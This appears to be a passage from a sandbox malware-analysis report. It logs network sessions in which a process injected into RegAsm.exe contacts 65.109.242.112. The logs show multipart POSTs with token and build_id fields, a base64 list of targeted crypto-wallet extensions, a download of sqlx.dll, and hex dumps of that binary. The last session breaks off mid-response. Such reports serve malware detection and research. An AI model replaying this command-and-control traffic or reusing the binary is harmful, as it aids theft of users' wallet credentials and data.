                                                                                                                                                                                                                                                                2024-05-12 10:47:00 UTC5605INData Raw: 31 35 64 38 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62
                                                                                                                                                                                                                                                                Data Ascii: 15d8TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                5192.168.2.44973565.109.242.1124432832C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-05-12 10:47:01 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----CAFHIJDHDGDBFHIEHDGI
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0
                                                                                                                                                                                                                                                                Host: 65.109.242.112
                                                                                                                                                                                                                                                                Content-Length: 332
                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                2024-05-12 10:47:01 UTC332OUTData Raw: 2d 2d 2d 2d 2d 2d 43 41 46 48 49 4a 44 48 44 47 44 42 46 48 49 45 48 44 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 32 33 34 63 65 31 39 31 64 39 30 37 35 39 33 32 39 36 65 65 38 38 62 36 37 39 33 61 37 65 35 0d 0a 2d 2d 2d 2d 2d 2d 43 41 46 48 49 4a 44 48 44 47 44 42 46 48 49 45 48 44 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 38 31 61 32 32 33 62 65 63 31 38 30 65 62 66 64 63 34 38 35 34 37 64 33 64 35 62 64 37 38 34 0d 0a 2d 2d 2d 2d 2d 2d 43 41 46 48 49 4a 44 48 44 47 44 42 46 48 49 45 48 44 47 49 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                Data Ascii: ------CAFHIJDHDGDBFHIEHDGIContent-Disposition: form-data; name="token"b234ce191d907593296ee88b6793a7e5------CAFHIJDHDGDBFHIEHDGIContent-Disposition: form-data; name="build_id"681a223bec180ebfdc48547d3d5bd784------CAFHIJDHDGDBFHIEHDGICont
                                                                                                                                                                                                                                                                2024-05-12 10:47:02 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                Date: Sun, 12 May 2024 10:47:02 GMT
                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                2024-05-12 10:47:02 UTC119INData Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                6192.168.2.44973665.109.242.1124432832C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-05-12 10:47:03 UTC327OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----ECBGCBGCAFIIECBFIDHI
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0
                                                                                                                                                                                                                                                                Host: 65.109.242.112
                                                                                                                                                                                                                                                                Content-Length: 7109
                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                2024-05-12 10:47:03 UTC7109OUTData Raw: 2d 2d 2d 2d 2d 2d 45 43 42 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 32 33 34 63 65 31 39 31 64 39 30 37 35 39 33 32 39 36 65 65 38 38 62 36 37 39 33 61 37 65 35 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 38 31 61 32 32 33 62 65 63 31 38 30 65 62 66 64 63 34 38 35 34 37 64 33 64 35 62 64 37 38 34 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                Data Ascii: ------ECBGCBGCAFIIECBFIDHIContent-Disposition: form-data; name="token"b234ce191d907593296ee88b6793a7e5------ECBGCBGCAFIIECBFIDHIContent-Disposition: form-data; name="build_id"681a223bec180ebfdc48547d3d5bd784------ECBGCBGCAFIIECBFIDHICont
                                                                                                                                                                                                                                                                2024-05-12 10:47:04 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                Date: Sun, 12 May 2024 10:47:04 GMT
                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                2024-05-12 10:47:04 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                Data Ascii: 2ok0


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                7192.168.2.44973765.109.242.1124432832C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-05-12 10:47:04 UTC242OUTGET /sqlx.dll HTTP/1.1
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0
                                                                                                                                                                                                                                                                Host: 65.109.242.112
                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                2024-05-12 10:47:05 UTC248INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                Date: Sun, 12 May 2024 10:47:04 GMT
                                                                                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                Content-Length: 2459136
                                                                                                                                                                                                                                                                Last-Modified: Mon, 06 May 2024 07:42:12 GMT
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                ETag: "663889d4-258600"
                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                2024-05-12 10:47:05 UTC16136INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$7ZYZYZYZnY\Y]YXYYZXYO\EYO]UYOZLYl3][Yl3Y[Yl3[Yl3[[YRichZY
                                                                                                                                                                                                                                                                2024-05-12 10:47:05 UTC16384INData Raw: cd 1e 00 e9 ba 58 1d 00 e9 7e 65 1b 00 e9 1b f0 1c 00 e9 01 21 1c 00 e9 b9 2a 1f 00 e9 d7 46 00 00 e9 92 83 17 00 e9 c5 ed 1e 00 e9 e8 57 03 00 e9 fa 7c 1b 00 e9 3e e1 00 00 e9 bd f4 1a 00 e9 b4 7c 00 00 e9 bf ca 1c 00 e9 4c db 1a 00 e9 31 31 1a 00 e9 34 e5 1c 00 e9 36 f1 1d 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                                                                                                                                                                                                Data Ascii: X~e!*FW|>|L1146
                                                                                                                                                                                                                                                                2024-05-12 10:47:05 UTC16384INData Raw: 74 12 8a 50 01 3a 51 01 75 0e 83 c0 02 83 c1 02 84 d2 75 e4 33 c0 eb 05 1b c0 83 c8 01 85 c0 74 15 83 c6 0c 47 81 fe c0 03 00 00 72 bf 5f 5e b8 0c 00 00 00 5b c3 8d 0c 7f 8b 14 8d 38 25 24 10 8d 04 8d 34 25 24 10 85 d2 75 09 8b 10 89 14 8d 38 25 24 10 8b 4c 24 18 85 c9 5f 0f 44 ca 5e 89 08 33 c0 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 33 ff 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 53 6a 02 6a ff ff 74 24 1c 56 e8 78 0c 15 00 8b d8 83 c4 10 85 db 74 21 6a 00 ff 74 24 24 ff 74 24 24 ff 74 24 24 53 56 e8 9a 68 04 00 53 56 8b f8 e8 51 39 10 00 83 c4 20 80 7e 57 00 5b
                                                                                                                                                                                                                                                                Data Ascii: tP:Quu3tGr_^[8%$4%$u8%$L$_D^3[Vt$W3FtPh $Sjjt$Vxt!jt$$t$$t$$SVhSVQ9 ~W[
                                                                                                                                                                                                                                                                2024-05-12 10:47:05 UTC16384INData Raw: be 0e 83 f9 30 7d e9 89 74 24 74 81 e3 ff ff ff 7f 89 5c 24 30 83 f9 6c 75 35 4e 0f be 4e 01 46 89 74 24 74 85 c9 0f 85 f0 fd ff ff eb 21 0f be 4e 01 46 c6 44 24 37 01 89 74 24 74 83 f9 6c 75 0e 0f be 4e 01 46 89 74 24 74 c6 44 24 37 02 8b 44 24 38 33 f6 89 44 24 58 ba 70 53 21 10 c7 44 24 50 70 53 21 10 c6 44 24 2e 11 0f be 02 3b c8 74 16 83 c2 06 46 81 fa fa 53 21 10 7c ed 8a 4c 24 2e 8b 54 24 50 eb 19 8d 04 76 8a 0c 45 73 53 21 10 8d 14 45 70 53 21 10 89 54 24 50 88 4c 24 2e 0f b6 c1 83 f8 10 0f 87 d9 14 00 00 ff 24 85 24 e1 00 10 c6 44 24 37 01 c6 44 24 43 00 f6 42 02 01 0f 84 97 00 00 00 80 7c 24 2d 00 74 44 8b 74 24 70 8b 56 04 39 16 7f 22 0f 57 c0 66 0f 13 44 24 68 8b 4c 24 6c 8b 74 24 68 8a 54 24 35 89 74 24 28 89 4c 24 58 e9 f4 00 00 00 8b 46 08
                                                                                                                                                                                                                                                                Data Ascii: 0}t$t\$0lu5NNFt$t!NFD$7t$tluNFt$tD$7D$83D$XpS!D$PpS!D$.;tFS!|L$.T$PvEsS!EpS!T$PL$.$$D$7D$CB|$-tDt$pV9"WfD$hL$lt$hT$5t$(L$XF
                                                                                                                                                                                                                                                                2024-05-12 10:47:05 UTC16384INData Raw: 24 14 3b c8 73 06 eb 0e 8b 44 24 14 8b c8 89 44 24 20 89 54 24 24 a1 08 22 24 10 03 44 24 10 99 8b f8 8b ea 85 f6 0f 85 6b 01 00 00 3b 6c 24 24 0f 8f 91 00 00 00 7c 08 3b f9 0f 83 87 00 00 00 8b 44 24 10 99 6a 00 8b ca c7 44 24 48 00 00 00 00 8d 54 24 48 89 44 24 38 52 51 50 55 57 89 4c 24 50 e8 38 3a ff ff 40 50 8b 44 24 34 50 8b 80 dc 00 00 00 ff d0 8b f0 83 c4 10 85 f6 75 1e 8b 54 24 1c 8b 44 24 44 55 57 ff 74 24 18 8b 0a ff 70 04 52 8b 41 0c ff d0 83 c4 14 8b f0 8b 44 24 44 85 c0 74 09 50 e8 dd f4 12 00 83 c4 04 03 7c 24 34 8b 4c 24 20 13 6c 24 38 85 f6 0f 84 6a ff ff ff e9 d0 00 00 00 8b 7c 24 1c 8d 4c 24 38 51 57 8b 07 8b 40 18 ff d0 8b f0 83 c4 08 85 f6 0f 85 b2 00 00 00 8b 4c 24 2c 39 4c 24 3c 7c 1e 7f 0a 8b 44 24 14 39 44 24 38 76 12 8b 07 51 ff
                                                                                                                                                                                                                                                                Data Ascii: $;sD$D$ T$$"$D$k;l$$|;D$jD$HT$HD$8RQPUWL$P8:@PD$4PuT$D$DUWt$pRAD$DtP|$4L$ l$8j|$L$8QW@L$,9L$<|D$9D$8vQ
                                                                                                                                                                                                                                                                2024-05-12 10:47:05 UTC16384INData Raw: 00 00 33 ff c7 40 0c 00 00 00 00 66 c7 40 11 01 00 8b 44 24 10 56 89 46 40 e8 3a 27 0d 00 83 c4 04 8b f0 eb 08 8b 7c 24 10 8b 74 24 0c 85 ff 0f 84 9d 00 00 00 83 47 10 ff 0f 85 93 00 00 00 ff 4b 3c 83 7f 08 01 75 0d 83 7f 0c 00 75 07 c7 43 1c ff ff ff ff 8b 07 85 c0 74 0e 50 53 e8 46 87 0a 00 83 c4 08 85 c0 75 0a 57 53 e8 38 88 0a 00 83 c4 08 57 53 e8 5e 81 0a 00 83 c4 08 83 3d 18 20 24 10 00 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 57 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 57 ff 15 3c 20 24 10 a1 38 82 24 10 83 c4 08 85 c0 74 13 50 ff 15 70 20 24 10 eb 07 57 ff 15 3c 20 24 10 83 c4 04 53 e8 a0 17 0d 00 83 c4 04 8b c6 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                                                                                                                                                                                                Data Ascii: 3@f@D$VF@:'|$t$GK<uuCtPSFuWS8WS^= $tB8$tPh $WD $)$$W< $8$tPp $W< $S_^[]
                                                                                                                                                                                                                                                                2024-05-12 10:47:05 UTC16384INData Raw: ff ff 0f b7 86 90 00 00 00 8b de 8b 54 24 10 8b 4c 24 24 8b 6c 24 20 89 47 10 8b 86 98 00 00 00 c1 e8 06 83 e0 01 89 54 24 10 89 47 14 80 bb 97 00 00 00 02 89 4c 24 14 0f 85 c8 fe ff ff b8 01 00 00 00 89 4c 24 14 89 54 24 10 e9 b8 fe ff ff 5f 5e 5d b8 07 00 00 00 5b 83 c4 18 c3 5f 5e 5d 33 c0 5b 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                                                                                                                                                                                                Data Ascii: T$L$$l$ GT$GL$L$T$_^][_^]3[
                                                                                                                                                                                                                                                                2024-05-12 10:47:06 UTC16384INData Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 7c 24 14 8b 46 10 8b 56 0c 8d 0c 80 8b 42 68 ff 74 88 fc ff 77 04 ff 37 e8 ac f3 11 00 83 c4 0c 85 c0 74 0b ff 37 56 e8 d3 67 fe ff 83 c4 08 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68 2c 67 21 10 ff 74 24 14 e8 bc d7 0d 00 83 c4 14 c3 cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68
                                                                                                                                                                                                                                                                Data Ascii: Vt$W|$FVBhtw7t7Vg_^jjjh,g!t$jjjh
                                                                                                                                                                                                                                                                2024-05-12 10:47:06 UTC16384INData Raw: 71 14 8b 41 08 f7 76 34 8b 46 38 8d 14 90 8b 02 3b c1 74 0d 0f 1f 40 00 8d 50 10 8b 02 3b c1 75 f7 8b 40 10 89 02 ff 4e 30 66 83 79 0c 00 8b 71 14 74 10 8b 46 3c 89 41 10 8b 46 04 89 4e 3c 5e ff 08 c3 ff 31 e8 6e 5a 0a 00 8b 46 04 83 c4 04 ff 08 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 4c 24 04 8b 54 24 10 56 57 8b 71 0c 85 f6 74 3c 8b 06 83 f8 01 74 1f 83 f8 02 74 1a 83 f8 05 74 15 33 ff 83 f8 03 75 26 bf 01 00 00 00 85 d7 74 1d 5f 33 c0 5e c3 83 7c 24 10 01 75 f4 83 7c 24 14 01 75 ed 5f b8 05 00 00 00 5e c3 33 ff 8b 41 04 52 ff 74 24 18 8b 08 ff 74 24 18 50 8b 41 38 ff d0 83 c4 10 85 ff 74 1c 85 c0 75 18 8b 4c 24 14 ba 01 00 00 00 d3 e2 8b 4c 24 10 4a d3 e2 09 96 c4 00 00 00 5f
                                                                                                                                                                                                                                                                Data Ascii: qAv4F8;t@P;u@N0fyqtF<AFN<^1nZF^L$T$VWqt<ttt3u&t_3^|$u|$u_^3ARt$t$PA8tuL$L$J_
                                                                                                                                                                                                                                                                2024-05-12 10:47:06 UTC16384INData Raw: cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 6a 00 6a 00 68 50 45 24 10 68 e8 40 22 10 56 e8 25 83 14 00 83 c4 14 80 7e 57 00 75 04 33 ff eb 0d 6a 00 56 e8 d0 b5 01 00 83 c4 08 8b f8 8b 46 0c 85 c0 74 0a 50 ff 15 70 20 24 10 83 c4 04 8b c7 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 56 57 8b 7c 24 10 ff b7 dc 00 00 00 e8 6d f6 fd ff 83 c4 04 8d 77 3c bb 28 00 00 00 0f 1f 00 ff 36 e8 58 f6 fd ff 83 c4 04 8d 76 04 83 eb 01 75 ee 8b b7 f8 00 00 00 85 f6 74 54 39 1d 18 20 24 10 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 56 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 56 ff 15 3c 20 24 10 a1 38 82 24 10 83
                                                                                                                                                                                                                                                                Data Ascii: Vt$WFtPh $jjhPE$h@"V%~Wu3jVFtPp $_^SVW|$mw<(6XvutT9 $tB8$tPh $VD $)$$V< $8$


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                8192.168.2.44973865.109.242.1124432832C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-05-12 10:47:09 UTC327OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----ECFHCGHJDBFIIDGDHIJD
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0
                                                                                                                                                                                                                                                                Host: 65.109.242.112
                                                                                                                                                                                                                                                                Content-Length: 4677
                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                2024-05-12 10:47:09 UTC4677OUTData Raw: 2d 2d 2d 2d 2d 2d 45 43 46 48 43 47 48 4a 44 42 46 49 49 44 47 44 48 49 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 32 33 34 63 65 31 39 31 64 39 30 37 35 39 33 32 39 36 65 65 38 38 62 36 37 39 33 61 37 65 35 0d 0a 2d 2d 2d 2d 2d 2d 45 43 46 48 43 47 48 4a 44 42 46 49 49 44 47 44 48 49 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 38 31 61 32 32 33 62 65 63 31 38 30 65 62 66 64 63 34 38 35 34 37 64 33 64 35 62 64 37 38 34 0d 0a 2d 2d 2d 2d 2d 2d 45 43 46 48 43 47 48 4a 44 42 46 49 49 44 47 44 48 49 4a 44 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                Data Ascii: ------ECFHCGHJDBFIIDGDHIJDContent-Disposition: form-data; name="token"b234ce191d907593296ee88b6793a7e5------ECFHCGHJDBFIIDGDHIJDContent-Disposition: form-data; name="build_id"681a223bec180ebfdc48547d3d5bd784------ECFHCGHJDBFIIDGDHIJDCont
                                                                                                                                                                                                                                                                2024-05-12 10:47:10 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                Date: Sun, 12 May 2024 10:47:10 GMT
                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                2024-05-12 10:47:10 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                Data Ascii: 2ok0


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                9192.168.2.44973965.109.242.1124432832C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-05-12 10:47:10 UTC327OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----IIEBAFCBKFIDGCAKKKFC
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0
                                                                                                                                                                                                                                                                Host: 65.109.242.112
                                                                                                                                                                                                                                                                Content-Length: 1529
                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                2024-05-12 10:47:10 UTC1529OUTData Raw: 2d 2d 2d 2d 2d 2d 49 49 45 42 41 46 43 42 4b 46 49 44 47 43 41 4b 4b 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 32 33 34 63 65 31 39 31 64 39 30 37 35 39 33 32 39 36 65 65 38 38 62 36 37 39 33 61 37 65 35 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 42 41 46 43 42 4b 46 49 44 47 43 41 4b 4b 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 38 31 61 32 32 33 62 65 63 31 38 30 65 62 66 64 63 34 38 35 34 37 64 33 64 35 62 64 37 38 34 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 42 41 46 43 42 4b 46 49 44 47 43 41 4b 4b 4b 46 43 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                Data Ascii: ------IIEBAFCBKFIDGCAKKKFCContent-Disposition: form-data; name="token"b234ce191d907593296ee88b6793a7e5------IIEBAFCBKFIDGCAKKKFCContent-Disposition: form-data; name="build_id"681a223bec180ebfdc48547d3d5bd784------IIEBAFCBKFIDGCAKKKFCCont
                                                                                                                                                                                                                                                                2024-05-12 10:47:11 UTC158INHTTP/1.1 200 OK
